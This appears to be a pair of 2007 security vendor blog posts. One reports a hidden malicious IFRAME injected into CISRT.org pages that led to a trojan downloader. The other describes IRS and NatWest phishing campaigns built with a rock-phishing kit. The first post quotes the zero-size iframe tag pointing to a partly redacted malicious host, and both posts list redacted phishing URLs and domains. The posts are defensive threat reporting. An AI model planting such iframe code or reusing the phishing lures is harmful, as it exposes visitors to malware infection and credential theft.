China’s on a 7-day holiday, but the Chinese Internet Security Response Team (CISRT) folks may opt to go to work instead because of this issue that has recently plagued their website. A malicious IFRAME tag has wormed its way into CISRT.org’s pages.

Compromised CISRT Web page

We checked the following three CISRT pages and have confirmed that the IFRAME tag exists on all of them:

http:// www. cisrt.org/enblog/read.php?172
http:// www. cisrt.org/enblog/
http:// www. cisrt.org/

*spaces included to prevent accidental clicking. For now (until the sites have been cleaned), users are advised to practice caution when browsing these sites.

The said IFRAME found on the top of the pages is:

iframe src=http://mms.{BLOCKED}mmn.com/99916.htm width=0 height=0 frameborder=0

Even the links posted in some tech-news sites pointing to the CISRT pages mentioned above are compromised!

The compromised pages lead to malicious IFRAMEs that load scripts and more IFRAMEs which eventually download, install and execute a trojan downloader with a filename of sms.exe. This downloader then downloads more malcodes into the infected system.

Trend Micro has already communicated with the good folks at CISRT about this incident. Please stay tuned for more updates regarding this issue.

UPDATE: (2:50 PM, October 2, 2007, GMT -08:00)

It seems the CISRT English Blog page has now been cleaned, but the main page is still hosting the malicious IFRAME.

[Update]

Trend Micro already detects the related codes for the compromised sites as HTML_IFRAME.HS and WORM_FUBALCA.AQ.

Trend Micro users are advised to download the latest pattern file to avoid getting infected by these threats.

The IRS is reportedly offering a refund just for filling in details of an online form. Sounds too good to be true, isn’t it?

It is. Clicking “click here” will actually redirect users to any of the following phishing sites. Luckily, all sites are inactive, as of this writing:

* http://www.{BLOCKED}ton.com/bridge/feedback.php
* http://{BLOCKED}tack.net/catalog/images/awstats/.stats/.secure/.server/.refund/login.html
* http://{BLOCKED}ab.hoseo.ac.kr:8080/Refund.html
* http://www.{BLOCKED}ho.ch/Tcho.chindex/jpg/not.php
* http://www.{BLOCKED}-let-go.net/gallery/include/help.php
* http://{BLOCKED}aintball.spb.ru/install/what.php
* http://{BLOCKED}anna.info/modules/www.irs.gov/
* http://{BLOCKED}0-167-2-130.sd.sd.cox.net/help/feedback.php
* http://{BLOCKED}anna.info/gallery/lang/irs.php
* http://www.{BLOCKED}an.agri-jahad.ir:84/IRS/redirect.html
* http://www.{BLOCKED}ive.com/doowop/best-of-doowop/_vti_cnf/images/images.php
* http://{BLOCKED}o.com/**http://61.74.158.71/recicler.php
* http://{BLOCKED}amnet.nfshost.com/gallery/themes/water_drop/images/.database/index.php
* http://www.{BLOCKED}e.ru/lang/index.php
* http://www.{BLOCKED}hunter.ru/img/help.php
* http://{BLOCKED}.{BLOCKED}.18.110:84/IRS.gov/

Believed to have been making rounds since late last August, this is yet another spammer’s ploy to phish for the account details of unsuspecting users. Though the IRS itself has warned the public repeatedly that it does not make contact through email, spammers are still making use of the tried-and-tested “authority” model as social engineering technique to trick users into giving sensitive information. Add a little monetary reward and someone is bound to take the bait.

This particular fake IRS spam blast was created using a rock-phishing kit that is still available in one of the open directories of the known phishing domains. Other subject headings for email containing this spam run include:

* Notification - Fiscal Activity (Tax Refund)
* IRS Notification - Fiscal Activity
* Notification of Tax Refund on your VISA or MasterCard Now
* Urgent Notification !
* IRS Notification - Tax Refund Online Form

Not too long ago, spammers used the IRS angle to scare people into opening a corrupt .PDF file, which actually proved to be TROJ_ARTIEF.B in hiding. Other malware families are also notorious for using tax as the main subject for their spam, specifically BAGLE variants.

A similar incident believed to be also created using a rock-phishing kit has occurred for the NatWest online banking site. See screenshot below:

The following sites were seen to be hosting these phishing scams:

* {BLOCKED}opoe5.cn
* {BLOCKED}opoe4.cn
* {BLOCKED}opoe3.cn
* {BLOCKED}opoe2.cn
* {BLOCKED}opoe1.cn
* {BLOCKED}nigor5.cn
* {BLOCKED}nigor4.cn
* {BLOCKED}nigor3.cn
* {BLOCKED}nigor2.cn
* {BLOCKED}nigor1.cn
* {BLOCKED}elstrom5.cn
* {BLOCKED}elstrom4.cn
* {BLOCKED}elstrom3.cn
* {BLOCKED}elstrom2.cn
* {BLOCKED}elstrom1.cn
* {BLOCKED}niole2.cn
* {BLOCKED}otpor1.cn
* {BLOCKED}opyor1.cn
* {BLOCKED}oporr1.cn
* {BLOCKED}opo6r1.cn
* {BLOCKED}opo4r1.cn
* {BLOCKED}opo3r1.cn
* {BLOCKED}opo2r1.cn
* {BLOCKED}opo1r1.cn
* {BLOCKED}op5or1.cn
* {BLOCKED}7opor1.cn
* {BLOCKED}lopor1.cn
* {BLOCKED}lopor1.cn
* {BLOCKED}lopor1.cn
* {BLOCKED}ker17.cn
* {BLOCKED}ker15.cn
* {BLOCKED}ker13.cn
* {BLOCKED}ker12.cn
* {BLOCKED}p1209.cn
* {BLOCKED}5p1209.cn
* {BLOCKED}3p1209.cn
* {BLOCKED}1p1209.cn
* {BLOCKED}op1209.cn
* {BLOCKED}op1209.cn
* {BLOCKED}op1209.cn
* {BLOCKED}op1209.cn

Always keep in mind that government agencies do not initiate contact by email, much less ask for personal data through email. Email is just too unsecure. If emails like these are received, it would be best to visit the yellow pages, call the respective agency yourself, or drop by for a visit.

Who knows? You may have just saved yourself from more than a promised rebate.

Additional information provided by Elizabeth Bookman.